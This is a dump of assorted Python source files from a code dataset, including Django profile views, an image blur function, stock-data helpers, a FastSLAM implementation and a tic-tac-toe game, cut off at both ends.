Response(serializer.data)\n\n\n\n\n","sub_path":"subscription_backend/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"554584653","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport cv2\n\n\ndef blur_image(input_filename, output_filename=None):\n src = cv2.imread(input_filename)\n\n src = src.astype(\"uint32\") # Prevent overloading when using uint8\n src = np.pad(src, ((1, 1), (1, 1), (0, 0)), mode='edge')\n\n # Calculate average of pixels nearby, creates blur effect\n dst = (src[1:-1, 1:-1, :] + src[:-2, 1:-1, :] + src[2:, 1:-1, :]\n + src[1:-1, :-2, :] + src[1:-1, 2:, :] + src[:-2, :-2, :]\n + src[2:, 2:, :] + src[:-2, 2:, :] + src[2:, :-2, :])/9\n\n dst = dst.astype(\"uint8\") # Round to nearest integer\n if output_filename:\n cv2.imwrite(output_filename, dst)\n\n return dst\n\n\nif __name__ == \"__main__\":\n blur_image(\"../images/beatles.jpg\")\n","sub_path":"assignment4/blur/blur_image.py","file_name":"blur_image.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"293153250","text":"class GoogleCloudStorage:\n def __init__(self, bucket, regexp, credentials):\n self.bucket = bucket\n self.regexp = regexp\n self.credentials = credentials\n\n def resource_type(self):\n return {\n \"name\": \"gcs\",\n \"type\": \"docker-image\",\n \"source\": {\n \"repository\": \"frodenas/gcs-resource\",\n \"tag\": \"latest\",\n },\n }\n\n def get(self, name):\n return self\n\n def concourse(self, name):\n result = {\n \"name\": name,\n \"type\": \"gcs\",\n \"icon\": \"file-cloud\",\n \"source\": {\n \"bucket\": self.bucket,\n \"regexp\": self.regexp,\n \"json_key\": self.credentials,\n },\n }\n return result\n","sub_path":"conpype/resources/gcs.py","file_name":"gcs.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"97712428","text":"from django.shortcuts import render\nfrom django.views import View\nfrom .models import SocialProfile, EducationWithInfo, WorkExperience, LanguageWithLevel\nfrom django.shortcuts import get_object_or_404\nfrom .forms import RegistrationForm, ProfileImageForm, PersonalDataForm, EducationWithInfoForm, WorkExperienceForm, InterestForm, SkillForm, LanguageWithLevelForm\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.urls import reverse\nfrom django.db import transaction\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\n\nclass ProfileView(LoginRequiredMixin, View):\n def get(self, request, profile_id):\n profile_data = get_object_or_404(SocialProfile, pk=profile_id)\n return render(request, 'social_profile/profile.html', {\n 'profile': profile_data\n })\n\n def post(self, request, profile_id):\n pass\n\n\nclass ProfileImageUpdateView(LoginRequiredMixin, View):\n\n def post(self, request):\n obj = get_object_or_404(SocialProfile, pk=request.user.socialprofile.id)\n image = request.FILES['profile_image']\n obj.profile_img = image\n obj.save()\n return HttpResponseRedirect(reverse('profile:profile_update', args=(obj.id,)))\n\n\nclass ProfileUpdateView(LoginRequiredMixin, View):\n def get(self, request, profile_id):\n obj = get_object_or_404(SocialProfile, pk=profile_id)\n image_form = ProfileImageForm\n return render(request, 'social_profile/profile_update_form.html', {\n 'image_form': image_form,\n 'obj': obj,\n })\n\n def post(self, request, profile_id):\n pass\n\n\nclass RegistrationView(View):\n def get(self, request):\n form = RegistrationForm\n return render(request, 'registration/registration.html', {\n 'form': form\n })\n\n @transaction.atomic\n def post(self, request):\n form = RegistrationForm(request.POST)\n if form.is_valid():\n profile_user = User.objects.create_user(\n request.POST['username'],\n request.POST['email'],\n request.POST['password']\n )\n\n profile = SocialProfile(\n user=profile_user,\n last_name=request.POST['last_name'],\n first_name=request.POST['first_name'],\n email=request.POST['email']\n )\n\n profile.save()\n return HttpResponseRedirect(reverse('institution:search'))\n else:\n return render(request, 'registration/registration.html', {'form': form})\n\n\nclass EducationAddView(LoginRequiredMixin, View):\n def get(self, request):\n form = EducationWithInfoForm\n return render(request, 'social_profile/update/education.html', {'form': form})\n\n def post(self, request):\n form = EducationWithInfoForm(request.POST)\n if form.is_valid():\n educ = form.save(commit=False)\n educ.profile = request.user.socialprofile\n educ.save()\n return JsonResponse({'': ''}, safe=False)\n else:\n error_message = \"Заполните правильно форму!\"\n return JsonResponse({'error': error_message}, safe=False)\n\n\nclass WorkExperienceAddView(LoginRequiredMixin, View):\n def get(self, request):\n form = WorkExperienceForm\n return render(request, 'social_profile/update/work_experience.html', {'form': form})\n\n def post(self, request):\n form = WorkExperienceForm(request.POST)\n if form.is_valid():\n w_e = form.save()\n w_e.socialprofile_set.add(request.user.socialprofile)\n w_e.save()\n return JsonResponse({'': ''}, safe=False)\n else:\n error_message = \"Заполните правильно форму!\"\n return JsonResponse({'error': error_message}, safe=False)\n\n\nclass InterestAddView(LoginRequiredMixin, View):\n def get(self, request):\n form = InterestForm\n return render(request, 'social_profile/update/interest.html', {'form': form})\n\n def post(self, request):\n form = InterestForm(request.POST)\n if form.is_valid():\n interest = form.save()\n interest.socialprofile_set.add(request.user.socialprofile)\n interest.save()\n return JsonResponse({'': ''}, safe=False)\n else:\n error_message = \"Заполните правильно форму!\"\n return JsonResponse({'error': error_message}, safe=False)\n\n\nclass SkillAddView(LoginRequiredMixin, View):\n def get(self, request):\n form = SkillForm\n return render(request, 'social_profile/update/skill.html', {'form': form})\n\n def post(self, request):\n form = SkillForm(request.POST)\n if form.is_valid():\n skill = form.save()\n skill.socialprofile_set.add(request.user.socialprofile)\n skill.save()\n return JsonResponse({'': ''}, safe=False)\n else:\n error_message = \"Заполните правильно форму!\"\n return JsonResponse({'error': error_message}, safe=False)\n\n\nclass LanguageAddView(LoginRequiredMixin, View):\n def get(self, request):\n form = LanguageWithLevelForm\n return render(request, 'social_profile/update/language_with_level.html', {'form': form})\n\n def post(self, request):\n form = LanguageWithLevelForm(request.POST)\n if form.is_valid():\n lang = form.save(commit=False)\n lang.profile = request.user.socialprofile\n lang.save()\n return JsonResponse({'': ''}, safe=False)\n else:\n error_message = \"Заполните правильно форму!\"\n return JsonResponse({'error': error_message}, safe=False)\n\n\ndef personal_data_update(request, profile_id):\n if request.method == 'POST':\n obj = get_object_or_404(SocialProfile, pk=profile_id)\n form = PersonalDataForm(request.POST, instance=obj)\n if form.is_valid():\n form.save()\n return JsonResponse({'last_name': request.POST['last_name'],\n 'first_name': request.POST['first_name'],\n 'email': request.POST['email'],\n 'contact_information_phone': request.POST['contact_information_phone'],\n 'contact_information_address': request.POST['contact_information_address'],\n 'date_of_birth': request.POST['date_of_birth'],\n 'patronymic': request.POST['patronymic'],\n 'about_myself': request.POST['about_myself'],\n }, safe=False)\n else:\n return JsonResponse({'': ''}, safe=False)\n else:\n obj = get_object_or_404(SocialProfile, pk=profile_id)\n personal_data_form = PersonalDataForm(instance=obj)\n return render(request, 'social_profile/update/personal_data.html', {\n 'form': personal_data_form,\n 'obj': obj\n })\n\n\ndef educationWithInfoDelete(request, education_id):\n if request.method == 'POST':\n ed_with_info = get_object_or_404(EducationWithInfo, pk=education_id)\n ed_with_info.delete()\n return JsonResponse({'': ''}, safe=False)\n else:\n pass\n\n\ndef languageWithLevelDelete(request, lang_id):\n if request.method == 'POST':\n lang = get_object_or_404(LanguageWithLevel, pk=lang_id)\n lang.delete()\n return JsonResponse({'': ''}, safe=False)\n else:\n pass\n\n\ndef workExperienceDelete(request, w_e_id):\n if request.method == 'POST':\n w_e = get_object_or_404(WorkExperience, pk=w_e_id)\n w_e.delete()\n return JsonResponse({'': ''}, safe=False)\n else:\n pass","sub_path":"social_profile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"399863532","text":"#coding:utf8\nimport os\nimport numpy as np\nimport datetime\n\nfrom . import half\n\n##### meta_dir\nmeta_dir='meta'\n\nstock_ids=os.path.join(meta_dir,'stock_ids.txt') ## 股票代码列表\nindex_ids=os.path.join(meta_dir,'index_ids.txt') ## 指数代码列表\nindustries=os.path.join(meta_dir,'industries.txt')\n\n#### 数据总目录\ndata_dir='data'\n\n# 每日历史记录目录\ndaily_dir=os.path.join(data_dir,'163_daily')\n\n\"\"\"output\"\"\"\n\noutput_dir='output'\n\n\n## 函数\n\ndef symbol_to_filename(symbol):\n # 简便的方法 for daily数据\n if symbol[0]=='0' :\n return os.path.join(daily_dir,symbol+'.sz')\n else :\n return os.path.join(daily_dir,symbol+'.ss')\n\n\ndef from_symbols_list_file(filename):\n return [line.strip() for line in open(filename)]\n\ndef load_recent_dates(ndays=100,index='399001.sz'):\n #index='000001.ss'\n index300=os.path.join(daily_dir,index)\n x=os.popen('head -n %d %s'%(ndays+1,index300)).read().splitlines()[1:]\n x=[l.split(',') for l in x]\n days=[l[0] for l in x]\n return days\n\ndef get_symbol_list(bk='主板'):\n li = open(stock_ids).read().splitlines()[1:]\n if bk =='主板' :\n return [x for x in li if x[:3]!='002']\n return []\n \n #return [line.strip() for line in open(haitai.stock_ids)]\n\ndef load_industries():\n d=dict()\n for line in open(industries) :\n line=line.strip()\n s,_,others=line.partition(' ')\n s+='.sz' if s[0]=='0' else '.ss'\n others,_,ind=others.rpartition(' ')\n others,_,big=others.rpartition(' ')\n ind=big+'-'+ind\n if ind not in d : d[ind]=[]\n d[ind].append(s)\n return d\n\ndef load_names():\n d=dict()\n for line in open(industries) :\n line=line.strip()\n s,_,others=line.partition(' ')\n s+='.sz' if s[0]=='0' else '.ss'\n others,_,ind=others.rpartition(' ')\n others,_,big=others.rpartition(' ')\n d[s]=(others)\n return d\n\n\n\ndef gen_array(symbol,ndays=100):\n filename=os.path.join(daily_dir,symbol)\n x=os.popen('head -n %d %s'%(ndays+1,filename)).read().splitlines()[1:]\n x=[l.split(',') for l in x]\n name=x[0][2]\n days=[[l[0],l[3],float(l[7])] for l in x]\n \n k=1\n last=None\n for i,day in enumerate(days) :\n flag=False\n if day[1]=='' or day[1]=='0.0': \n flag=True\n day[1]=day[2]\n else : \n day[1]=float(day[1])\n if last==None :\n last=day[2]\n else :\n if last!=day[1] :\n k=k*day[1]/last\n pass\n last=day[2]\n day[1]/=k\n #if flag : return None,None,None\n dates,prices,_=(zip(*days))\n return name,dates,prices\n\nclass Symbol (object) :\n def __init__(self, s):\n if type(s) is Symbol :\n self.market = s.market\n self.number = s.number\n return\n if len(s) == 7 :\n self.market = 'ss' if s[0] == '0' else 'sz'\n self.number = s[1:]\n return\n if len(s) == 6 :\n self.number = s\n if s[0] in '6' :\n self.market = 'ss'\n else :\n self.market = 'sz'\n return\n if len(s) == 9 :\n self.number,_ , self.market = s.partition('.')\n return\n\n def to_ndm(self):\n return \"%s.%s\"%(self.number, self.market)\n\n\ndef get_daily(symbol, ndays = 100):\n sym = Symbol(symbol)\n filename = os.path.join(daily_dir, sym.to_ndm())\n\n x = os.popen(\n 'head -n %d %s'%(ndays + 1, filename)\n ).read().splitlines()[1:]\n\n x=[l.split(',') for l in x]\n name=x[0][2]\n days=[[l[0],l[3],float(l[7])] for l in x]\n \n k = 1 # 复权的系数\n last = None\n for i, day in enumerate(days):\n if day[1]=='' or day[1]=='0.0': # 停牌的时候\n day[1]=day[2]\n else : \n day[1]=float(day[1])\n\n if last is not None and last != day[0] :\n k = k * day[1] / last\n\n last = day[2]\n day[1] /= k\n\n dates,prices,_=(zip(*days))\n prices=np.array(prices)\n dates=[list(map(int,date.split('-')))for date in dates]\n dates=[datetime.date(*date) for date in dates]\n return {'name':name,'date':dates,'price':prices,'symbol':symbol}\n\ndef daily(symbol,ndays=100):\n filename=os.path.join(daily_dir,symbol)\n x=os.popen('head -n %d %s'%(ndays+1,filename)).read().splitlines()[1:]\n x=[l.split(',') for l in x]\n name=x[0][2]\n days=[[l[0],l[3],float(l[7])] for l in x]\n \n k=1\n last=None\n for i,day in enumerate(days) :\n flag=False\n if day[1]=='' or day[1]=='0.0': \n flag=True\n day[1]=day[2]\n else : \n day[1]=float(day[1])\n if last==None :\n last=day[2]\n else :\n if last!=day[1] :\n k=k*day[1]/last\n pass\n last=day[2]\n day[1]/=k\n #if flag : return None,None,None\n dates,prices,_=(zip(*days))\n prices=np.array(prices)\n dates=[list(map(int,date.split('-')))for date in dates]\n dates=[datetime.date(*date) for date in dates]\n return {'name':name,'date':dates,'price':prices,'symbol':symbol}\n\n\ndef symbols(syms=set()):\n for line in open(stock_ids) :\n line=line.strip()\n","sub_path":"haitai/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"110487285","text":"#! /usr/bin/python\n\nfrom __future__ import division\nimport numpy as np\nfrom numpy import dot\nimport math\nimport argparse\nimport utilsObfuscated as utils\nimport visualizer\nimport random\nfrom time import sleep\nimport copy\n\nnp.set_printoptions(suppress=True)\ndebug = False\n\nclass Particle(object): \n \"\"\" container for particle information\n\n each particle holds its estimation of the robot's location\n as well as its estimate of each landmark's location\n\n attributes: \n robot_position: a tuple of the robot's position (x, y) and \n heading (phi)\n i.e., (x, y, phi)\n landmarks: a list of tuples of landmark locations described by \n mean (x, y) and a covariance matrix sigma\n i.e., [((x, y), sigma)]\n weight: the current weight for the particle; stored inside\n the particle for convenience. remember to reset after\n resampling\n\n \"\"\"\n\n def __str__(self): \n \"\"\" \n Return a string reprsenting each particle; good for debugging purposes. \n \"\"\"\n return \"\"\n\n def __init__(self, x, y, phi):\n super(Particle, self).__init__()\n self.robot_position = (x, y, phi)\n self.landmarks = []\n # log of the weight\n self.weight = 0.0; \n\n\n# ----- PARAMETERS ----- Feel free to experiment, but please use these values for your final handin\n# velocity noise\nsigma_v = 0.1\n# radial noise\nsigma_r = 0.01\n# added control noise; for update_robot sample\nsigma_control = np.array([[sigma_v**2, 0], [0, sigma_r**2]])\n\n# distance (range) noise \nsigma_d = 3\n# bearing noise\nsigma_p = .30\n# observation noise\nsigma_observation = np.array([[sigma_d**2, 0], [0, sigma_p**2]])\n\n# probability threshold (for update_map)\nprob_threshold = 0.005\n\ndef generate_initial_particles(lmap, num_states, init_state):\n \"\"\" generates the list of initial particles\n\n args: \n num_states: the number of particles to generate\n init_state: the position in which to generate the particles\n\n returns: \n the list of generated particles\n\n \"\"\"\n return [Particle(init_state[0], init_state[1], init_state[2]) for i in range(num_states)]\n\n\ndef update_robot(particle, control): \n \"\"\" updates the robot's position according to control\n\n the robot's new position is determined based on the control, with \n added noise to account for control error. \n\n args: \n particle: the particle containing the robot position information\n control: the control inputted on the robot\n \n returns: \n the inputed particle \n \"\"\"\n curr_x, curr_y, curr_theta = particle.robot_position\n control_theta, control_velocity = control\n \n\n #value of this noise is sampled from a multivariate gaussian with \n #mean of the control's velocity and bearing\n # covariance (represented as a 2x2 matrix) of the parameter sigma_control (the control noise)\n\n mean = (control_velocity, control_theta)\n noise_distance, noise_bearing = utils.gauss_sample(mean, sigma_control)\n \n #new absolute angle is current angle plus the bearing calculated\n new_theta = curr_theta + noise_bearing\n #use new angle to calculate new posistions\n new_x = curr_x + math.cos(new_theta)*noise_distance\n new_y = curr_y + math.sin(new_theta)*noise_distance\n #update the robot's posistion\n particle.robot_position = (new_x, new_y, new_theta)\n\n return particle\n\ndef add_landmark(particle, measurement): \n \"\"\" adds newly observed landmark to particle\n\n if a landmark has not been matched to an existing landmark, \n add it to the particle's list with the appropriate \n mean (x, y) and covariance (sigma)\n\n args: \n particle: the particle to add the new landmark to\n measurement: the measurement to the new landmark (distance, bearing) to add to the particle\n\n returns: \n None\n \"\"\"\n robot_x, robot_y, robot_theta = particle.robot_position\n distance, bearing = measurement\n\n\n #use trig to find the landmark's possistion\n landmark_x = distance*math.cos(bearing + robot_theta) + robot_x\n landmark_y = distance*math.sin(bearing + robot_theta) + robot_y\n\n jacobian = utils.calculate_jacobian((robot_x, robot_y), (landmark_x, landmark_y))\n init_cov = utils.compute_initial_covariance(jacobian, sigma_observation)\n\n #initialize particle.landmarks if necessary \n #add the posistion and covariacne\n if len(particle.landmarks) == 0:\n particle.landmarks = [((landmark_x, landmark_y), init_cov)]\n else:\n particle.landmarks.append(((landmark_x, landmark_y), init_cov))\n\n return None\n\ndef update_landmark(particle, landmark, measurement):\n \"\"\" update the mean and covariance of a landmark\n\n uses the Extended Kalman Filter (EKF) to update the existing\n landmark's mean (x, y) and covariance according to the new measurement\n\n args: \n particle: the particle to update\n landmark: the old_landmark to update, ((x, y), covariance)\n measurement: the new measurement to `landmark`, \n in the form of (distance, bearing)\n \n returns: \n\n None\n \"\"\"\n robot_x, robot_y, robot_theta = particle.robot_position\n distance, bearing = measurement\n\n landmark_pos = landmark[0]\n oldCovariance = landmark[1]\n landmark_x = landmark_pos[0]\n landmark_y = landmark_pos[1]\n x_dif = landmark_x-robot_x\n y_dif = landmark_y-robot_y\n #calculate the predicted measurement using landmark and robot posistions\n m_r = math.sqrt(x_dif*x_dif + y_dif*y_dif)\n m_phi = math.atan2(y_dif, x_dif)\n predicted_measurement = (m_r, m_phi)\n\n jacobian = utils.calculate_jacobian((robot_x, robot_y), (landmark_x, landmark_y))\n Q = utils.compute_measurement_covariance(jacobian, oldCovariance, sigma_observation)\n K = utils.compute_kalman_gain(jacobian, oldCovariance, Q)\n\n new_landmark = utils.compute_new_landmark(measurement, predicted_measurement, K, landmark_pos)\n\n new_cov = utils.compute_new_covariance(K, jacobian, oldCovariance)\n\n #remove the landmark from the particle's list of landmarks then change landmark and add it back\n particle.landmarks.remove(landmark)\n landmark = (new_landmark, new_cov)\n particle.landmarks.append(landmark)\n\ndef update_map(particle, measurements): \n\n \"\"\" associates new measurements with old landmarks\n\n given a list of measurements to landmarks, determine whether a \n landmark is a new landmark or a re-observed landmark. If it is\n a new one, call add_landmark(). If it is an existing landmark, \n call update_landmark(), and update the weight. \n \n \n traditionally done maximizing the likelihood of observation at\n that particular correspondance\n\n args: \n particle: the particle to perform the data association on\n measurements: a list of (distance, bearing) where a landmark was observed\n\n returns: \n index pairs? none if not matched\n\n \"\"\"\n # retrieve the newly sampled robot pos\n robot_x,robot_y,robot_theta = particle.robot_position\n\n \n #some measurements were [] so need to loop through and only work with the valid ones\n valid_measurements = []\n for m in measurements:\n if len(m)>0:\n valid_measurements.append(m)\n\n weight_as_log_sum = 0\n #loop through non-empty measurements to find the best landmark and best probability\n for measurement in valid_measurements:\n best_landmark = None\n best_prob = 0\n for landmark in particle.landmarks:\n landmark_pos = landmark[0]\n oldCovariance = landmark[1]\n landmark_x, landmark_y = landmark_pos\n x_dif = landmark_x-robot_x\n y_dif = landmark_y-robot_y\n m_r = math.sqrt(x_dif*x_dif + y_dif*y_dif)\n m_phi = math.atan2(y_dif,x_dif)-robot_theta\n #calculate where the landmark should be \n predicted_measurement = (m_r, m_phi)\n\n jacobian = utils.calculate_jacobian((robot_x, robot_y), (landmark_x, landmark_y))\n Q = utils.compute_measurement_covariance(jacobian, oldCovariance, sigma_observation)\n likelihood = utils.calculate_likelihood_probability(measurement, predicted_measurement, Q)\n if likelihood > best_prob:\n best_prob = likelihood\n best_landmark = landmark\n #if the landmark is likely to be a new landmark then add it \n if best_prob < prob_threshold:\n add_landmark(particle, measurement)\n weight_as_log_sum += np.log(prob_threshold)\n #otherwise if it is likely the same as an observed landmark, update it\n else: \n update_landmark(particle, best_landmark, measurement)\n weight_as_log_sum += np.log(best_prob)\n\n #update the particles weight, will take e^weight later\n particle.weight = weight_as_log_sum \n\n\n\n\ndef resample_particles(particles): \n \"\"\" resample particles according to weight\n\n Sample (with replacement) from the list of particles \n according to their weight, which was assigned in the \n update_map() section. Be sure to copy each particle\n\n args: A transformation for extracting new descriptors of shape H Blum, Models for the perception of speech and visual form, 1967\n particles: a list of particles to sample from\n\n returns: \n a list of particles of the same length as the \n input, sampled according to the particle's weight\n \"\"\"\n\n num_particles = len(particles)\n \n #find the sum of the particle weights to normalize vector\n particle_weight_sum = 0\n for particle in particles:\n particle_weight_sum += np.exp(particle.weight)\n\n\n #normalize particle_weights\n norm_particle_weights = []\n for i in range (0, num_particles):\n norm_particle_weights.append(np.exp(particles[i].weight)/particle_weight_sum)\n \n #sample_results will be a list where the ith element represetns how many time the ith particle\n #was choosen to be in the new sample\n sample_results = list(np.random.multinomial(num_particles, norm_particle_weights))\n\n new_particles = []\n #loop though all the particles, adding it to new_particles the number of times specified by sample_results\n for k in range(0,num_particles):\n for i in range (0, sample_results[k]):\n to_add = copy.deepcopy(particles[k])\n to_add.weight = 0\n new_particles.append(to_add)\n\n return new_particles\n\n\ndef SLAM(init_particles, controls, measurements, true_position, true_landmarks, lidar_map, vis=1): \n \"\"\" Runs the fastSLAM algorithm on the given inputs\n\n Args: \n init_particles: an Nx3 array of (x-coordinate, y-coordinate, phi), the initial candidate points.\n controls: a Tx2 array of (degree change, velocity), the movement at each time step.\n measurements: a TxMx2 array of (distance, angle), the measured distance to a landmark in that direction at that timestep.\n true_position - a (T+1)x3 array representing the true position of the robot from start to end\n true_landmarks - a TxK array of landmarks representing the true locations of the landmarks\n lidar_map: an XxY array representing a discretized map. Each position in the array represents whetehr a space is empty, represented by a 0, or filled (an obstacle) represented by a 1. Generated by calling utils.load_map on the appropriate .pgm file.\n\tvis: a flag dictating whether to run the visualizer or not. You should NOT make any changes that result\tin the visualizer being called when vis=False\n \n Returns: \n None\n \"\"\"\n\n if vis > 0:\n visualizer.init_vis(lidar_map, true_landmarks, init_particles, true_position[0,:], vis)\n particles = init_particles\n\n #for a timestep t\n for t in range(len(measurements)): \n \n #update the particles by calling update_robot to get the new particle for every particle\n #then for every particle call update map with the measurement at time t\n new_particles = []\n for particle in particles:\n new_particle = update_robot(particle, controls[t])\n new_particles.append(new_particle)\n update_map(new_particle, measurements[t])\n \n \n if vis > 0:\n visualizer.update_vis(lidar_map, true_landmarks, new_particles, true_position[t+1,:], vis)\n\n #resample the particles\n particles = resample_particles(new_particles)\n \n\ndef main(): \n \n parser = argparse.ArgumentParser()\n parser.add_argument('-t', '--test', help=\"A test directory containing map.pgm, measure.csv, control.csv, and ground.csv files\", required=True)\n parser.add_argument('-v', '--visualizer', type=int, default=0, help='0 : off, 1 : default visualizer, 2 : particle visualizer')\n parser.add_argument('-n', '--numstart', type=int, default=50)\n parser.add_argument('-e', '--error', type=float, default=0.0)\n\n args = parser.parse_args()\n lmap = utils.load_map('tests/' + args.test + '/map.pgm')\n landmarks = utils.load_csv('tests/' + args.test + '/landmarks.csv')\n controls = utils.load_csv('tests/' + args.test + '/control.csv') #a Tx2 array of T (delta phi, velocity)'s\n measurements = [[np.random.multivariate_normal((distance, bearing), args.error*sigma_observation) for distance, bearing in measurement] for measurement in utils.load_measurements('tests/' + args.test + '/measure.csv')]\n true_start = utils.load_csv('tests/' + args.test + '/ground.csv')\n start_posns = generate_initial_particles(lmap, args.numstart, true_start[0])\n if debug:\n print(\"Running SLAM...\")\n SLAM(start_posns, controls, measurements, true_start, landmarks, lmap, args.visualizer)\n\nif __name__ == \"__main__\": \n main()\n","sub_path":"fastSLAM.py","file_name":"fastSLAM.py","file_ext":"py","file_size_in_byte":13773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"173251355","text":"# 실험 번호, 실험 환경 번호, 사용자 고유 이름(room number), \\\n# 시작 장치 번호, 시작 장치 서버 도달 시간, 시작 직선 정보(x, y, timestamp(delta)) 10개, \\\n# 끝 장치 번호, 끝 장치 서버 도달 시간, 끝 직선 정보(x, y, timestamp(delta))\n\n\n#{'1': [[[0, 0], [1120.0, 0.0], [1120.0, 788.0386983289358], [0.0, 788.0386983289358]], 1, 0], '2': [[[1618.5888428851285, -191.02877813636232], [2540.7599485821715, -68.71102380729093], [2454.696445096457, 580.1340813445421], [1532.5253393994144, 457.81632701547073]], 0.8305784945014116, 0.13187129094494932]}\n\n# 장치-직선정보:\n## 1. 장치 번호\n## 1.5 직선 번호\n## 2. 직선 정보 서버 도달 시간\n## 3. 직선 정보(x, y, timestamp(delta)) 10개\nimport os\nimport json\n\ndef createFolder(dir):\n try:\n if not(os.path.isdir(dir)):\n os.makedirs(os.path.join(dir))\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n\nexp_seq = 0\nexp_path = \"./exp/\"\ncreateFolder(exp_path)\nif not os.path.isfile(exp_path + \"meta.txt\"):\n tmp = open(exp_path + \"meta.txt\", \"w\")\n tmp.write(str(exp_seq))\n tmp.close()\n\ntmp = open(exp_path + \"meta.txt\", \"r\")\nexp_seq = int(tmp.read())\nprint(\"the present exp_seq: \" + str(exp_seq))\ntmp.close()\nsave_path = exp_path + \"data/\"\n# save new device-line data\ndef saveLine(data):\n global exp_seq\n for i, d in enumerate(data):\n fn = str(exp_seq) + \"-\" + str(d['env']) + \"-\" + str(int(d['line_num'])) + \"-\" + str(d['subject']) + \".json\"\n ret = open(save_path + fn, \"w\")\n ret.write(json.dumps(d, ensure_ascii=False, indent=\"\\t\"))\n ret.close()\n exp_seq += 1\n tmp = open(exp_path + \"meta.txt\", \"w+\")\n tmp.write(str(exp_seq))\n tmp.close()\n\ndef storePattern(data, expNum):\n global exp_seq\n fn = str(exp_seq) + \"-\" + str(expNum) + \".json\"\n ret = open(exp_path + \"dataPattern/\" + fn, \"w\")\n ret.write(json.dumps(data, ensure_ascii=False, indent=\"\\t\"))\n ret.close()\n exp_seq += 1\n tmp = open(exp_path + \"meta.txt\", \"w+\")\n tmp.write(str(exp_seq))\n tmp.close()","sub_path":"pythons/fileio.py","file_name":"fileio.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"195928038","text":"# simulate tic tac to game play\n\n\n# draw game board\ndef draw_game_board(board_values):\n horizontal = \" --- \" * 3\n for i in range(3):\n print(horizontal)\n print((\"| %s \" % board_values[i][0]) + (\"| %s \" % board_values[i][1]) + (\"| %s \" % board_values[i][2]) + '|')\n print(horizontal)\n\n\n# player game play\ndef player_move(player_param):\n if player_param == 1:\n player_one_coord = str(input('Player one move: ')).strip().split(',')\n return ['X', player_one_coord]\n elif player_param == 2:\n player_two_coord = str(input('Player two move: ')).strip().split(',')\n return ['O', player_two_coord]\n\n\n# validate user input\ndef validate_player_input(list_param):\n if len(list_param[1]) != 2:\n print('Invlaid input, Please play again')\n return False\n\n if 1 < int(list_param[1][0]) > 3 or 1 < int(list_param[1][1]) > 3:\n print('Please enter correct co-ordinates')\n return False\n\n return True\n\n\n# populate the board\ndef board_play(player_values_list, board_param):\n player_value = player_values_list[0]\n row_value = int(player_values_list[1][0]) - 1\n column_value = int(player_values_list[1][1]) - 1\n\n if board_param[row_value][column_value] != 0:\n print('The board is already played, Please play again')\n return False\n else:\n board_param[row_value][column_value] = player_value\n return True\n\n\n# game play\ndef game_play(player_param, board_param):\n while True:\n p_play = player_move(player_param)\n if validate_player_input(p_play):\n if board_play(p_play, board_param):\n # redraw the board\n draw_game_board(board_param)\n break\n\n\n# check if board is full\ndef plays(plays_numbers):\n if plays_numbers == 0:\n print('All moves have been played. There is no winner')\n return True\n\n\n# check winner from board\ndef check_winner(board_param):\n # check row\n for x in range(3):\n if board_param[x][0] != 0:\n if board_param[x][0] == board_param[x][1] == board_param[x][2]:\n return board_param[x][0]\n\n # check columns\n for y in range(3):\n if board_param[0][y] != 0:\n if board_param[0][y] == board_param[1][y] == board_param[2][y]:\n return board[0][y]\n\n # check diagonals\n if board[1][1] != 0:\n if board[0][0] == board[1][1] == board[2][2]:\n return board[1][1]\n\n if board[1][1] != 0:\n if board[0][2] == board[1][1] == board[2][0]:\n return board[1][1]\n\n return False\n\n\n# print game winner\ndef print_winner(win_value):\n if win_value == 'X':\n print('\\nplayer one won')\n elif win_value == 'O':\n print('\\nPlayer two won')\n\n\n# switch player\ndef switch_player(player_param):\n if player_param == 1:\n return 2\n else:\n return 1\n\n\nif __name__ == '__main__':\n\n print('\\nWelcome to tic tac toe game')\n print('Player one is X and player two is 0')\n print('Make a move by typing the co-ordinates of where you want to play')\n print('use this format 1,2 where 1 is row and 2 is column\\n')\n print('Please use numbers 1,2,3\\n')\n\n board, playing, plays_number, player = [[0, 0, 0], [0, 0, 0], [0, 0, 0]], True, 9, 1\n\n # draw initial empty board\n draw_game_board(board)\n\n while playing:\n\n # player Game Play\n game_play(player, board)\n\n # check winner and print or continue\n grid_check = check_winner(board)\n if grid_check:\n print_winner(grid_check)\n break\n\n # update the number of plays left\n plays_number -= 1\n if plays(plays_number):\n break\n else:\n # switch player\n player = switch_player(player)\n","sub_path":"029_tic_tac_toe_full.py","file_name":"029_tic_tac_toe_full.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"440397894","text":"import slowclap as sc\nimport requests\n\ndef getActivated(headers):\n\tresp = requests.get(\"http://projects.danjscott.co.uk/intheroom/isActivated\", headers=headers)\n\tif resp.status_code == 200:\n\t\treturn True;\n\telse:\n\t\treturn False;\n\n\ndeactivateUrl = \"http://projects.danjscott.co.uk/intheroom/Deactivate\"\n\nactivateUrl = \"http://projects.danjscott.co.uk/intheroom/Activate\"\n\ntoken = 